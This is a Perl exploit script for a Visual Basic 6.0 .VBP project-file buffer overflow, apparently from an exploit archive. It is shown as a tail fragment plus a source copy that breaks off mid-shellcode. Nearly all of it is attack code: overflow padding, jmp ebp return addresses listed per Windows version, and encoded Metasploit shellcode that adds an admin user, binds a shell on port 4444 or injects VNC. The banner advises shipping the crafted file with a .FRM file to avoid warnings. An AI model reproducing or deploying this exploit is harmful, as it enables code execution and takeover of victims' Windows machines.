"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56".  
"\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42".  
"\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35".  
"\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56".  
"\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32".  
"\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56".  
"\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32".  
"\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32".  
"\x42\x30\x5a";  
  
$endQuote = "\x22";  
  
$i = $ARGV[0];  
  
  
if ($i==1){  
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";  
exit;  
}  
  
  
if ($i==2){  
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";  
exit;  
}  
  
  
if ($i==3){  
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";  
exit;  
}  
  
  
if ($i==4){  
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";  
exit;  
}  
  
  
if ($i==5){  
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";  
exit;  
}  
  
  
print "\n";  
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
print " +++ +++\n";  
print " +++ +++\n";  
print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\n";  
print " +++ Written By Koshi +++\n";  
print " +++ Greets: Rima my baby! Draven, thanks for helping. +++\n";  
print " +++ +++\n";  
print " +++ Usage Ex.: ./vb6.pl 1 &gt;&gt;Project1.vbp +++\n";  
print " +++ +++\n";  
print " +++ Options: +++\n";  
print " +++ 1 - win32_exec CALC.EXE +++\n";  
print " +++ 2 - win32_adduser Pass=4dmin User=koshi +++\n";  
print " +++ 3 - win32_bind Port 4444 +++\n";  
print " +++ 4 - win32_bind_vncinject Port 5900 +++\n";  
print " +++ 5 - win32_exec shutdown -c \x22HAI VEn0m pw.. +++\n";  
print " +++ +++\n";  
print " +++ +++\n";  
print " +++ Notes: Ship final .VBP file with a .FRM file to avoid +++\n";  
print " +++ warnings in Visual Basic 6.0 +++\n";  
print " +++ +++\n";  
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
  
  
  
  
  
  
exit;  
  
  
#EOF  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/59048/msvb-codeexec.txt", "sourceData": "`#!/usr/bin/perl \n#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++ \n#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n#'++ Author: Koshi + \n#'++ Email: heykoshi at gmail dot com + \n#'++ Application: Microsoft Visual Basic 6.0 + \n#'++ + \n#'++ Tested on Microsoft Windows XP Home Edition SP2 + \n#'++ Patched & Updated + \n#'++ + \n#'++ The vulnerable buffer exsists in the .VBP files of + \n#'++ Visual Basic projects. You can jump directly to + \n#'++ the shellcode, or jump to it via EBP. + \n#'++ + \n#'++ There is NO restriction of shellcode size either. + \n#'++ + \n#'++ Gr33tz: Rima my baby who I love and adore, Draven + \n#'++ for pointing me in the right direction, as always. + \n#'++ + \n#'++ + \n#'++ This exploit is for educational use only, blah. + \n#'++ + \n#'++ + \n#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n#'+++++++++++++++++++++++++++++++++++++++++++++++++++++ \n# \n# Ex. of Usage: \n# perl vb6.pl 1 >>Project.vbp \n# \n# \n$begin0 = \"\\x54\\x79\\x70\\x65\\x3D\\x45\\x78\\x65\\x0D\\x0A\\x46\\x6F\\x72\\x6D\". \n\"\\x3D\\x46\\x6F\\x72\\x6D\\x31\\x2E\\x66\\x72\\x6D\\x0D\\x0A\"; \n \n$begin1 = \"\\x52\\x65\\x66\\x65\\x72\\x65\\x6E\\x63\\x65\\x3D\". \n\"\\x2A\\x5C\\x47\\x7B\\x30\\x30\\x30\\x32\\x30\\x34\\x33\\x30\\x2D\\x30\". \n\"\\x30\\x30\\x30\\x2D\\x30\\x30\\x30\\x30\\x2D\\x43\\x30\\x30\\x30\\x2D\". \n\"\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x34\\x36\\x7D\\x23\". \n\"\\x32\\x2E\\x30\\x23\\x30\\x23\\x2E\\x2E\\x5C\\x2E\\x2E\\x5C\\x2E\\x2E\". \n\"\\x5C\\x2E\\x2E\\x5C\\x2E\\x2E\\x5C\\x57\\x49\\x4E\\x44\\x4F\\x57\\x53\". \n\"\\x5C\\x73\\x79\\x73\\x74\\x65\\x6D\\x33\\x32\\x5C\\x73\\x74\\x64\\x6F\". \n\"\\x6C\\x65\\x32\\x2E\\x74\\x6C\\x62\\x23\\x4F\\x4C\\x45\\x20\\x41\\x75\". \n\"\\x74\\x6F\\x6D\\x61\\x74\\x69\\x6F\\x6E\"; \n \n$begin2 = \"\\x0D\\x0A\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x3D\\x22\\x46\\x6F\\x72\\x6D\\x31\\x22\\x0D\\x0A\". \n\"\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x33\\x32\\x3D\\x22\\x22\"; \n \n$BuffOf = \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\"; \n \n$codeAddr = \"\\x83\\x25\\x40\\x01\"; \n# You can most likely use a call or a push, you could probably use them from kernel32.dll too. \n#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example. \n# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) \n# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) \n# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) \n# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) \n# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) \n# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) \n#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) \n# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) \n# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) \n# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) \n# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions \n# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) \n# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) \n# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions \n# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions \n# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions \n# ...backwards..if you don't know why, then gtfo. \n$jmpEbp = \"\\xA3\\x3D\\x92\\x7C\"; \n$fourSkin = \"\\x44\\x44\\x44\\x44\"; \n \n \n$begin3 = \"\\x0D\\x0A\\x4E\\x61\\x6D\\x65\\x3D\\x22\\x50\\x72\\x6F\\x6A\\x65\\x63\". \n\"\\x74\\x31\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"; \n \n$koshi = \"\\x0D\\x0A\\x48\\x65\\x6C\\x70\\x43\\x6F\\x6E\\x74\\x65\\x78\\x74\\x49\\x44\\x3D\\x22\\x30\\x22\\x0D\\x0A\\x43\\x6F\\x6D\". \n\"\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x4D\\x6F\\x64\\x65\\x3D\\x22\\x30\\x22\\x0D\\x0A\\x4D\\x61\\x6A\\x6F\\x72\\x56\\x65\". \n\"\\x72\\x3D\\x31\\x0D\\x0A\\x4D\\x69\\x6E\\x6F\\x72\\x56\\x65\\x72\\x3D\\x30\\x0D\\x0A\\x52\\x65\\x76\\x69\\x73\\x69\\x6F\". \n\"\\x6E\\x56\\x65\\x72\\x3D\\x30\\x0D\\x0A\\x41\\x75\\x74\\x6F\\x49\\x6E\\x63\\x72\\x65\\x6D\\x65\\x6E\\x74\\x56\\x65\\x72\". \n\"\\x3D\\x30\\x0D\\x0A\\x53\\x65\\x72\\x76\\x65\\x72\\x53\\x75\\x70\\x70\\x6F\\x72\\x74\\x46\\x69\\x6C\\x65\\x73\\x3D\\x30\". \n\"\\x0D\\x0A\\x43\\x6F\\x6D\\x70\\x69\\x6C\\x61\\x74\\x69\\x6F\\x6E\\x54\\x79\\x70\\x65\\x3D\\x30\\x0D\\x0A\\x4F\\x70\\x74\". \n\"\\x69\\x6D\\x69\\x7A\\x61\\x74\\x69\\x6F\\x6E\\x54\\x79\\x70\\x65\\x3D\\x30\\x0D\\x0A\\x46\\x61\\x76\\x6F\\x72\\x50\\x65\". \n\"\\x6E\\x74\\x69\\x75\\x6D\\x50\\x72\\x6F\\x28\\x74\\x6D\\x29\\x3D\\x30\\x0D\\x0A\\x43\\x6F\\x64\\x65\\x56\\x69\\x65\\x77\". \n\"\\x44\\x65\\x62\\x75\\x67\\x49\\x6E\\x66\\x6F\\x3D\\x30\\x0D\\x0A\\x4E\\x6F\\x41\\x6C\\x69\\x61\\x73\\x69\\x6E\\x67\\x3D\". \n\"\\x30\\x0D\\x0A\\x42\\x6F\\x75\\x6E\\x64\\x73\\x43\\x68\\x65\\x63\\x6B\\x3D\\x30\\x0D\\x0A\\x4F\\x76\\x65\\x72\\x66\\x6C\". \n\"\\x6F\\x77\\x43\\x68\\x65\\x63\\x6B\\x3D\\x30\\x0D\\x0A\\x46\\x6C\\x50\\x6F\\x69\\x6E\\x74\\x43\\x68\\x65\\x63\\x6B\\x3D\". \n\"\\x30\\x0D\\x0A\\x46\\x44\\x49\\x56\\x43\\x68\\x65\\x63\\x6B\\x3D\\x30\\x0D\\x0A\\x55\\x6E\\x72\\x6F\\x75\\x6E\\x64\\x65\". \n\"\\x64\\x46\\x50\\x3D\\x30\\x0D\\x0A\\x53\\x74\\x61\\x72\\x74\\x4D\\x6F\\x64\\x65\\x3D\\x30\\x0D\\x0A\\x55\\x6E\\x61\\x74\". \n\"\\x74\\x65\\x6E\\x64\\x65\\x64\\x3D\\x30\\x0D\\x0A\\x52\\x65\\x74\\x61\\x69\\x6E\\x65\\x64\\x3D\\x30\\x0D\\x0A\\x54\\x68\". \n\"\\x72\\x65\\x61\\x64\\x50\\x65\\x72\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3D\\x30\\x0D\\x0A\\x4D\\x61\\x78\\x4E\\x75\\x6D\\x62\". \n\"\\x65\\x72\\x4F\\x66\\x54\\x68\\x72\\x65\\x61\\x64\\x73\\x3D\\x31\\x0D\\x0A\\x0D\\x0A\\x5B\\x4D\\x53\\x20\\x54\\x72\\x61\". \n\"\\x6E\\x73\\x61\\x63\\x74\\x69\\x6F\\x6E\\x20\\x53\\x65\\x72\\x76\\x65\\x72\\x5D\\x0D\\x0A\\x41\\x75\\x74\\x6F\\x52\\x65\". \n\"\\x66\\x72\\x65\\x73\\x68\\x3D\\x31\\x0D\\x0A\"; \n \n# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com \n$shellc1 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\". \n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47\". \n\"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x41\\x4b\\x38\". \n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x48\". \n\"\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x48\\x42\\x4c\". \n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x52\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x58\". \n\"\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x48\\x4e\\x30\\x4b\\x44\". \n\"\\x4b\\x48\\x4f\\x35\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x51\\x4b\\x38\". \n\"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\". \n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x34\\x42\\x33\\x45\\x38\\x42\\x4c\\x4a\\x47\". \n\"\\x4e\\x30\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x58\\x42\\x47\\x4e\\x41\\x4d\\x4a\". \n\"\\x4b\\x58\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b\". \n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x4a\\x56\\x4e\\x43\\x4f\\x55\\x41\\x33\". \n\"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\". \n\"\\x42\\x55\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x35\\x4a\\x36\\x4a\\x59\". \n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\". \n\"\\x4e\\x46\\x43\\x56\\x50\\x32\\x45\\x46\\x4a\\x37\\x45\\x36\\x42\\x50\\x5a\"; \n \n# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com \n$shellc2 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\". \n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x44\\x4e\\x53\\x4b\\x38\\x4e\\x37\". \n\"\\x45\\x50\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x51\\x4b\\x58\". \n\"\\x4f\\x35\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x38\\x46\\x53\\x4b\\x48\". \n\"\\x41\\x30\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c\". \n\"\\x46\\x57\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x52\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\". \n\"\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x48\\x4e\\x50\\x4b\\x54\". \n\"\\x4b\\x48\\x4f\\x55\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x51\\x4b\\x58\". \n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x55\\x46\\x42\\x46\\x30\\x43\\x4c\\x41\\x33\". \n\"\\x42\\x4c\\x46\\x46\\x4b\\x58\\x42\\x34\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x37\". \n\"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x30\\x4b\\x48\\x42\\x37\\x4e\\x51\\x4d\\x4a\". \n\"\\x4b\\x58\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b\". \n\"\\x42\\x30\\x42\\x30\\x42\\x50\\x4b\\x58\\x4a\\x36\\x4e\\x53\\x4f\\x45\\x41\\x53\". \n\"\\x48\\x4f\\x42\\x36\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\". \n\"\\x42\\x55\\x4a\\x56\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x46\\x4a\\x59\". \n\"\\x50\\x4f\\x4c\\x58\\x50\\x30\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x4d\\x46\". \n\"\\x46\\x56\\x50\\x42\\x45\\x36\\x4a\\x37\\x45\\x56\\x42\\x32\\x4f\\x52\\x43\\x46\". \n\"\\x42\\x42\\x50\\x56\\x45\\x46\\x46\\x47\\x42\\x52\\x45\\x47\\x43\\x37\\x45\\x36\". \n\"\\x44\\x57\\x42\\x42\\x46\\x53\\x46\\x36\\x4d\\x56\\x49\\x46\\x50\\x56\\x42\\x32\". \n\"\\x4b\\x36\\x4f\\x36\\x43\\x37\\x4a\\x46\\x49\\x36\\x42\\x32\\x4f\\x42\\x41\\x34\". \n\"\\x46\\x54\\x46\\x34\\x42\\x32\\x48\\x52\\x48\\x52\\x42\\x52\\x50\\x36\\x45\\x46\". \n\"\\x46\\x57\\x42\\x42\\x4e\\x56\\x4f\\x36\\x43\\x36\\x41\\x36\\x4e\\x46\\x47\\x56\". \n\"\\x44\\x37\\x4f\\x36\\x45\\x57\\x42\\x57\\x42\\x52\\x41\\x44\\x46\\x56\\x4d\\x56\". \n\"\\x49\\x46\\x50\\x56\\x49\\x46\\x43\\x47\\x46\\x57\\x44\\x37\\x41\\x36\\x46\\x57\". \n\"\\x4f\\x46\\x44\\x37\\x43\\x37\\x42\\x32\\x46\\x43\\x46\\x36\\x4d\\x56\\x49\\x36\". \n\"\\x50\\x56\\x42\\x42\\x4f\\x32\\x41\\x44\\x46\\x54\\x46\\x54\\x42\\x50\\x5a\"; \n \n# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com \n$shellc3 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\". \n\"\\x4d\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x38\". \n\"\\x4e\\x36\\x46\\x52\\x46\\x32\\x4b\\x38\\x45\\x54\\x4e\\x53\\x4b\\x48\\x4e\\x37\". \n\"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x44\\x4a\\x41\\x4b\\x58\". \n\"\\x4f\\x45\\x42\\x52\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x33\\x4b\\x48\". \n\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x58\\x42\\x4c\". \n\"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x50\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x33\\x46\\x35\\x46\\x32\\x4a\\x32\\x45\\x57\\x45\\x4e\\x4b\\x48\". \n\"\\x4f\\x35\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x36\\x4b\\x58\\x4e\\x30\\x4b\\x54\". \n\"\\x4b\\x58\\x4f\\x35\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x43\\x50\\x4e\\x52\\x4b\\x58\". \n\"\\x49\\x58\\x4e\\x46\\x46\\x52\\x4e\\x31\\x41\\x46\\x43\\x4c\\x41\\x33\\x4b\\x4d\". \n\"\\x46\\x46\\x4b\\x48\\x43\\x34\\x42\\x53\\x4b\\x58\\x42\\x54\\x4e\\x30\\x4b\\x48\". \n\"\\x42\\x57\\x4e\\x31\\x4d\\x4a\\x4b\\x48\\x42\\x44\\x4a\\x50\\x50\\x45\\x4a\\x46\". \n\"\\x50\\x38\\x50\\x34\\x50\\x50\\x4e\\x4e\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x48\\x46\". \n\"\\x43\\x45\\x48\\x56\\x4a\\x36\\x43\\x53\\x44\\x33\\x4a\\x46\\x47\\x57\\x43\\x37\". \n\"\\x44\\x53\\x4f\\x55\\x46\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\". \n\"\\x4e\\x4f\\x4b\\x53\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x38\\x45\\x4e\". \n\"\\x48\\x36\\x41\\x58\\x4d\\x4e\\x4a\\x50\\x44\\x30\\x45\\x45\\x4c\\x36\\x44\\x50\". \n\"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x45\". \n\"\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\\x43\\x55\\x43\\x55\\x43\\x55\\x43\\x54\". \n\"\\x43\\x45\\x43\\x54\\x43\\x45\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4a\\x36\\x41\\x31\". \n\"\\x4e\\x35\\x48\\x46\\x43\\x55\\x49\\x58\\x41\\x4e\\x45\\x59\\x4a\\x46\\x46\\x4a\". \n\"\\x4c\\x41\\x42\\x47\\x47\\x4c\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x46\\x42\\x31\". \n\"\\x41\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x46\\x4a\\x4d\\x4a\\x50\\x32\". \n\"\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\". \n\"\\x4a\\x56\\x45\\x4e\\x49\\x44\\x48\\x38\\x49\\x34\\x47\\x55\\x4f\\x4f\\x48\\x4d\". \n\"\\x42\\x45\\x46\\x45\\x46\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x43\\x59\\x4a\\x36\". \n\"\\x47\\x4e\\x49\\x47\\x48\\x4c\\x49\\x37\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x45\\x45\". \n\"\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4c\\x36\\x46\\x56\\x48\\x46\\x4a\\x36\\x43\\x46\". \n\"\\x4d\\x36\\x49\\x38\\x45\\x4e\\x4c\\x46\\x42\\x35\\x49\\x45\\x49\\x32\\x4e\\x4c\". 